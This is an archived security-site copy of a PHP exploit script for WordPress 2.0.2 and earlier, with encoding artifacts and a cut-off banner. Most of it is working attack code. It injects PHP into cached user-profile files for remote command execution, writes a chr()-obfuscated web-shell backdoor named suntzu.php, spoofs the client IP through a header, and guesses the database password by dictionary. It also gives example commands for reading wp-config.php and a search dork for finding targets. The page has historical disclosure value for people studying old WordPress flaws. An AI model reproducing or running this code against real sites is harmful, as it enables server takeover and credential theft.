TUCoPS :: Web :: Blogs :: b06-2473.htm

Wordpress <=2.0.2 'cache' shell injection
Wordpress <=2.0.2 'cache' shell injection
Wordpress <=2.0.2 'cache' shell injection


#!/usr/bin/php -q -d short_open_tag=on=0D
rgod@autistici.org |\r\n";=0D 
echo "| site: http://retrogod.altervista.org |\r\n";=0D 
echo "| dork: inurl:wp-login.php Register Username Password -echo        |\r\n";=0D
echo "--------------------------------------------------------------------\r\n";=0D
=0D
/*=0D
this works:=0D
regardless of all php.ini settings,=0D
if user registration is enabled,=0D
against an empty or weak MySQL DB password (read explination for details...)=0D
*/=0D
=0D
if ($argc<6) {=0D
echo "Usage: php ".$argv[0]." host path user pass cmd OPTIONS             \r\n";=0D
echo "host:      target server (ip/hostname)                              \r\n";=0D
echo "path:      path to WordPress                                        \r\n";=0D
echo "cmd:       a shell command                                          \r\n";=0D
echo "user/pass: you need a valid user account                            \r\n";=0D
echo "Options:                                                            \r\n";=0D
echo "   -D[dicrionary] specify a textfile and try dictionary attack      \r\n";=0D
echo "   -p[port]:        \"  a port other than 80                        \r\n";=0D
echo "   -P[ip:port]:     \"  a proxy                                     \r\n";=0D
echo "Examples:                                                           \r\n";=0D
echo "php ".$argv[0]." localhost /wordpress/ your_username password ls -la -Ddic.txt\r\n";=0D
echo "php ".$argv[0]." localhost /wordpress/ your_username password cat ./../../../wp-config.php -p81\r\n";=0D
echo "php ".$argv[0]." localhost / your_username password ls -la -P1.1.1.1:80\r\n\r\n";=0D
die;=0D
}=0D
=0D
/* explaination:=0D
=0D
  i) wordpress stores some user informations inside cached files=0D
   in wp-content/cache/userlogins/ and wp-content/cache/users/ folders, they are=0D
   php files.=0D
   Normally they look like this:=0D
=0D
   //O:8:"stdClass":23:{s:2:"ID";s:3:"106";s:10:"user_login";s:6:"suntzu";s:9:"user_pass";s:32:"a2b0f31cd94e749b58307775462e2e4b";s:13:"user_nicename";s:6:"suntzu";s:10:"user_email";s:18:"suntzoi@suntzu.org";s:8:"user_url";s:0:"";s:15:"user_registered";s:19:"2006-05-24 23:00:42";s:19:"user_activation_key";s:0:"";s:11:"user_status";s:1:"0";s:12:"display_name";s:6:"suntzu";s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";s:8:"nickname";s:6:"suntzu";s:11:"description";s:0:"";s:6:"jabber";s:0:"";s:3:"aim";s:0:"";s:3:"yim";s:0:"";s:15:"wp_capabilities";a:1:{s:10:"subscriber";b:1;}s:13:"wp_user_level";s:1:"0";s:10:"user_level";s:1:"0";s:14:"user_firstname";s:0:"";s:13:"user_lastname";s:0:"";s:16:"user_description";s:0:"";}=0D 
   ?>=0D
=0D
   but...what happens if you inject a carriage return ( chr(13)...), some php code and some=0D
   escape chars when you update your profile (ex. in "displayname" argument)?=0D
=0D
   Look at this file now:=0D
=0D
   //O:8:"stdClass":24:{s:2:"ID";s:3:"106";s:10:"user_login";s:6:"suntzu";s:9:"user_pass";s:32:"a2b0f31cd94e749b58307775462e2e4b";s:13:"user_nicename";s:6:"suntzu";s:10:"user_email";s:17:"suntzu@suntzu.org";s:8:"user_url";s:7:"http://";s:15:"user_registered";s:19:"2006-05-24 23:00:42";s:19:"user_activation_key";s:0:"";s:11:"user_status";s:1:"0";s:12:"display_name";s:185:"suntzu=0D 
   error_reporting(0);set_time_limit(0);if (get_magic_quotes_gpc()){$_REQUEST[cmd]=stripslashes($_REQUEST[cmd]);}echo 56789;passthru($_REQUEST[cmd]);echo 56789;//suntzuuuuuuuuuuuuuu";s:10:"first_name";s:6:"suntzu";s:9:"last_name";s:6:"suntzu";s:8:"nickname";s:6:"suntzu";s:11:"description";s:6:"whoami";s:6:"jabber";s:0:"";s:3:"aim";s:0:"";s:3:"yim";s:0:"";s:15:"wp_capabilities";a:1:{s:10:"subscriber";b:1;}s:13:"wp_user_level";s:1:"0";s:10:"user_level";s:1:"0";s:12:"rich_editing";s:4:"true";s:14:"user_firstname";s:6:"suntzu";s:13:"user_lastname";s:6:"suntzu";s:16:"user_description";s:6:"whoami";}=0D
   ?>=0D
=0D
   you have a backdoor on target server...=0D
=0D
   Now you have to search a way to guess filenames 'cause we have an=0D
   index.php to trivially protect folders, but... guess what?=0D
=0D
   give a look at wp-includes/cache.php at line 355:=0D
=0D
   ...=0D
   $cache_file = $group_dir.md5($id.DB_PASSWORD).'.php';=0D
   ...=0D
=0D
   $group_dir is the folder where files are stored=0D
   DB_PASSWORD costant could be empty, if so...=0D
   you have only to calculate the md5 hash of your user id, then:=0D
=0D
http://[target]/[path]/wp-content/cache/users/[md5(user_id)].php?cmd=ls%20-la=0D 
=0D
   the same with userlogins/ folder, this time:=0D
=0D
http://[target]/[path]/wp-content/cache/userlogins/[md5(username)].php?cmd=ls%20-la=0D 
=0D
   otherwise you can check if DB_PASSWORD is in a dictionary through the -D option,=0D
   this tool calculate the hash to do something like this:=0D
=0D
http://[target]/[path]/wp-content/cache/users/[md5([user_id][db_pass])].php?cmd=ls%20-la=0D 
http://[target]/[path]/wp-content/cache/userloginss/[md5([username][db_pass])].php?cmd=ls%20-la=0D 
=0D
  ii) an ip-spoofing issue in vars.php:=0D
=0D
  ...=0D
  // On OS X Server, $_SERVER['REMOTE_ADDR'] is the server's address. Workaround this=0D
  // by using $_SERVER['HTTP_PC_REMOTE_ADDR'], which *is* the remote address.=0D
  if ( isset($_SERVER['HTTP_PC_REMOTE_ADDR']) )=0D
  	$_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_PC_REMOTE_ADDR'];=0D
  ...=0D
=0D
  poc:=0D
  you can set an http header like this when you register:=0D
=0D
  PC_REMOTE_ADDR: 1.1.1.1=0D
									      */=0D
error_reporting(0);=0D
ini_set("max_execution_time",0);=0D
ini_set("default_socket_timeout",5);=0D
=0D
function quick_dump($string)=0D
{=0D
  $result='';$exa='';$cont=0;=0D
  for ($i=0; $i<=strlen($string)-1; $i++)=0D
  {=0D
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))=0D
   {$result.="  .";}=0D
   else=0D
   {$result.="  ".$string[$i];}=0D
   if (strlen(dechex(ord($string[$i])))==2)=0D
   {$exa.=" ".dechex(ord($string[$i]));}=0D
   else=0D
   {$exa.=" 0".dechex(ord($string[$i]));}=0D
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}=0D
  }=0D
 return $exa."\r\n".$result;=0D
}=0D
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';=0D
function sendpacketii($packet)=0D
{=0D
  global $proxy, $host, $port, $html, $proxy_regex;=0D
  if ($proxy=='') {=0D
    $ock=fsockopen(gethostbyname($host),$port);=0D
    if (!$ock) {=0D
      echo 'No response from '.$host.':'.$port; die;=0D
    }=0D
  }=0D
  else {=0D
	$c = preg_match($proxy_regex,$proxy);=0D
    if (!$c) {=0D
      echo 'Not a valid proxy...';die;=0D
    }=0D
    $parts=explode(':',$proxy);=0D
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";=0D
    $ock=fsockopen($parts[0],$parts[1]);=0D
    if (!$ock) {=0D
      echo 'No response from proxy...';die;=0D
	}=0D
  }=0D
  fputs($ock,$packet);=0D
  if ($proxy=='') {=0D
    $html='';=0D
    while (!feof($ock)) {=0D
      $html.=fgets($ock);=0D
    }=0D
  }=0D
  else {=0D
    $html='';=0D
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {=0D
      $html.=fread($ock,1);=0D
    }=0D
  }=0D
  fclose($ock);=0D
  #debug=0D
  #echo "\r\n".$html;=0D
=0D
}=0D
$host=$argv[1];=0D
$path=$argv[2];=0D
$username=$argv[3];=0D
$password=$argv[4];=0D
$cmd="";=0D
$port=80;=0D
$proxy="";=0D
$dict="";=0D
=0D
for ($i=5; $i<=$argc-1; $i++){=0D
$t=$argv[$i][0].$argv[$i][1];=0D
if (($t<>"-p") and ($t<>"-P") and ($t<>"-D"))=0D
{$cmd.=" ".$argv[$i];}=0D
if ($t=="-p")=0D
{=0D
  $port=str_replace("-p","",$argv[$i]);=0D
}=0D
if ($t=="-P")=0D
{=0D
  $proxy=str_replace("-P","",$argv[$i]);=0D
}=0D
if ($t=="-D")=0D
{=0D
  $dict=str_replace("-D","",$argv[$i]);=0D
}=0D
}=0D
$cmd=urlencode($cmd);=0D
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}=0D
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}=0D 
=0D
echo "step 0 -> check if suntzu.php is already installed...\r\n";=0D
$check=array("users/suntzu.php",=0D
	     "userlogins/suntzu.php"=0D
	     );=0D
for ($i=0; $i<=count($check)-1; $i++)=0D
{=0D
  $packet="GET ".$p."wp-content/cache/".$check[$i]." HTTP/1.0\r\n";=0D
  $packet.="Host: ".$host."\r\n";=0D
  $packet.="Cookie: cmd=".$cmd."\r\n";=0D
  $packet.="Connection: close\r\n\r\n";=0D
  sendpacketii($packet);=0D
  if (strstr($html,"*DL*"))=0D
  {=0D
echo "Exploit succeeded...\r\n";$temp=explode("*DL*",$html);echo $temp[1]."\r\n";echo"Now you can launch commands through the followig url:\r\n http://".$host.$path."wp-content/cache/".$check[$i]."?cmd=ls%20-la";die;=0D 
  }=0D
}=0D
echo "step 1 -> Login ...\r\n";=0D
$data="log=".urlencode(trim($username));=0D
$data.="&pwd=".urlencode(trim($password));=0D
$data.="&rememberme=forever";=0D
$data.="&submit=".urlencode("Login »");=0D
$data.="&redirect_to=wp-admin";=0D
$packet="POST ".$p."wp-login.php HTTP/1.0\r\n";=0D
$packet.="PC_REMOTE_ADDR: 1.1.1.1\r\n"; //ip spoofing bug in vars.php ;)...=0D
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";=0D
$packet.="Host: ".$host."\r\n";=0D
$packet.="Content-Length: ".strlen($data)."\r\n";=0D
$packet.="Connection: close\r\n\r\n";=0D
$packet.=$data;=0D
sendpacketii($packet);=0D
$temp=explode("Set-Cookie: ",$html);=0D
$temp2=explode(" ",$temp[1]);=0D
$cookie=$temp2[0];=0D
$temp2=explode(" ",$temp[2]);=0D
$cookie.=" ".$temp2[0];=0D
if ($cookie==''){echo "Unable to login...";die;}=0D
else {echo "cookie ->".$cookie."\r\n";}=0D
=0D
echo "step 2 -> Retrieve your user id...\r\n";=0D
$packet="GET ".$p."wp-admin/profile.php HTTP/1.0\r\n";=0D
$packet.="PC_REMOTE_ADDR: 1.1.1.1\r\n";=0D
$packet.="Host: ".$host."\r\n";=0D
$packet.="Cookie: ".$cookie."\r\n";=0D
$packet.="Connection: close\r\n\r\n";=0D
$packet.=$data;=0D
sendpacketii($packet);=0D
$temp=explode("checkuser_id\" value=\"",$html);=0D
$temp2=explode("\"",$temp[1]);=0D
$user_id=$temp2[0];=0D
if ($user_id==''){die("Unable to retrieve user id...\r\n");}=0D
else {echo "user id -> ".$user_id."\r\n";}=0D
=0D
echo "step 3 -> Update your profile with the evil code...\r\n";=0D
$suntzu='$fp=fopen("suntzu.php","w");fputs($fp,chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(114).chr(114).chr(111).chr(114).chr(95).chr(114).chr(101).chr(112).chr(111).chr(114).chr(116).chr(105).chr(110).chr(103).chr(40).chr(48).chr(41).chr(59).chr(115).chr(101).chr(116).chr(95).chr(116).chr(105).chr(109).chr(101).chr(95).chr(108).chr(105).chr(109).chr(105).chr(116).chr(40).chr(48).chr(41).chr(59).chr(105).chr(102).chr(32).chr(40).chr(103).chr(101).chr(116).chr(95).chr(109).chr(97).chr(103).chr(105).chr(99).chr(95).chr(113).chr(117).chr(111).chr(116).chr(101).chr(115).chr(95).chr(103).chr(112).chr(99).chr(40).chr(41).chr(41).chr(123).chr(36).chr(95).chr(82).chr(69).chr(81).chr(85).chr(69).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(61).chr(115).chr(116).chr(114).chr(105).chr(112).chr(115).chr(108).chr(97).chr(115).chr(104).chr(101).chr(115).chr(40).chr(36).chr(95).chr(82).chr(69).chr(81).chr(85).chr(69).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(59).chr(125).chr(101).chr(99).chr(104).chr(111).chr(32).chr(34).chr(42).chr(68).chr(76).chr(42).chr(34).chr(59).chr(112).chr(97).chr(115).chr(115).chr(116).chr(104).chr(114).chr(117).chr(40).chr(36).chr(95).chr(82).chr(69).chr(81).chr(85).chr(69).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(59).chr(63).chr(62));fclose($fp);//';=0D
$suntzu=urlencode($suntzu);=0D
$code='error_reporting(0);set_time_limit(0);if (get_magic_quotes_gpc()){$_REQUEST[cmd]=stripslashes($_REQUEST[cmd]);}echo chr(42).chr(68).chr(76).chr(42);passthru($_REQUEST[cmd]);echo chr(42).chr(68).chr(76).chr(42);';=0D
$code=urlencode($code);=0D
$data="from=profile";=0D
$data.="&checkuser_id=".$user_id;=0D
$data.="&user_login=".urlencode(trim($username));=0D
$data.="&first_name=".urlencode(trim($username));=0D
$data.="&last_name=".urlencode(trim($username)).chr(13).$suntzu."//suntzuuu";=0D
$data.="&nickname=".urlencode(trim($username));=0D
$data.="&display_name=".urlencode(trim($username)).chr(13).$code."//suntzuu";=0D
$data.="&email=".urlencode("suntzu@suntzu.org");=0D 
$data.="&url=".urlencode("http://");=0D 
$data.="&aim=";=0D
$data.="&yim=";=0D
$data.="&jabber=";=0D
$data.="&description=whoami";=0D
$data.="&rich_editing=true";=0D
$data.="&submit=".urlencode("Update Profile »");=0D
$packet="POST ".$p."wp-admin/profile-update.php HTTP/1.0\r\n";=0D
$packet.="PC_REMOTE_ADDR: 1.1.1.1\r\n";=0D
$packet.="Accept-Encoding: gzip, deflate\r\n";=0D
$packet.="Accept-Language: en\r\n";=0D
$packet.="Referer: http://".$host.$path."wp-admin/profile-update.php\r\n";=0D 
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";=0D
$packet.="Host: ".$host."\r\n";=0D
$packet.="Content-Length: ".strlen($data)."\r\n";=0D
$packet.="Cookie: ".$cookie."\r\n";=0D
$packet.="Connection: close\r\n\r\n";=0D
$packet.=$data;=0D
sendpacketii($packet);=0D
if (eregi("updated=true",$html)){echo "Done...\r\n";}=0D
else {die("Unable to update profile...");}=0D
=0D
echo "step 4 -> go to profile page to avoid cached files deletion...\r\n";=0D
$packet="GET ".$p."wp-admin/profile.php?updated=true HTTP/1.0\r\n";=0D
$packet.="PC_REMOTE_ADDR: 1.1.1.1\r\n";=0D
$packet.="Host: ".$host."\r\n";=0D
$packet.="Cookie: ".$cookie."\r\n";=0D
$packet.="Connection: close\r\n\r\n";=0D
sendpacketii($packet);=0D
if (eregi("200 OK",$html)){echo "Done...\r\n";}=0D
sleep(2);=0D
=0D
echo "step 5 -> check for an empty db password...\r\n";=0D
$check=array("users/".md5($user_id).".php",=0D
	     "userlogins/".md5(trim($username)).".php"=0D
	     );=0D
for ($i=0; $i<=count($check)-1; $i++)=0D
{=0D
  $packet="GET ".$p."wp-content/cache/".$check[$i]." HTTP/1.0\r\n";=0D
  $packet.="Host: ".$host."\r\n";=0D
  $packet.="Cookie: cmd=".$cmd."\r\n";=0D
  $packet.="Connection: close\r\n\r\n";=0D
  sendpacketii($packet);=0D
  if (eregi("*DL*",$html))=0D
  {=0D
echo "Exploit succeeded...\r\n";$temp=explode("*DL*",$html);echo($temp[1]);echo"\r\nNow you can launch commands through the followig urls:\r\n http://".$host.$path."wp-content/cache/".$check[$i]."?cmd=ls%20-la\r\nalso, you should have a backdoor called suntzu.php in the same folder\r\n";die;=0D 
  }=0D
}=0D
=0D
if ($dict=='') {echo "exploit failed...\r\n";}=0D
else=0D
   {=0D
    echo "step 6 -> trying with dictionary attack...\r\n";=0D
    if (file_exists($dict))=0D
    {=0D
      $fp=fopen($dict,"r");=0D
      while (!feof($fp))=0D
      {=0D
        $word=trim(fgets($fp));=0D
        $check=array("users/".md5($user_id.$word).".php",=0D
	             "userlogins/".md5(trim($username).$word).".php"=0D
	            );=0D
        for ($i=0; $i<=count($check)-1; $i++)=0D
        {=0D
	  echo "Trying with ".$check[$i]."\r\n";=0D
          $packet="GET ".$p."wp-content/cache/".$check[$i]." HTTP/1.0\r\n";=0D
          $packet.="Host: ".$host."\r\n";=0D
          $packet.="Cookie: cmd=".$cmd."\r\n";=0D
          $packet.="Connection: close\r\n\r\n";=0D
          sendpacketii($packet);=0D
          if (strstr($html,"*DL*"))=0D
          {=0D
echo "Exploit succeeded...\r\n";fclose($fp);$temp=explode("*DL*",$html);echo $temp[1];echo"Now you can launch commands through the followig url:\r\n http://".$host.$path."wp-content/cache/".$check[$i]."?cmd=ls%20-la\r\nalso, you should have a backdoor called suntzu.php in the same folder\r\n";=0D 
	    die;=0D
          }=0D
        }=0D
     }=0D
     fclose($fp);=0D
     //if you are here...=0D
     echo "Exploit failed...\r\n";=0D
   }=0D
   else=0D
   {=0D
     die($dict."does not exist!");=0D
   }=0D
  }=0D
?>=0D
=0D
=0D
original url: http://retrogod.altervista.org/wordpress_202_xpl.html

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH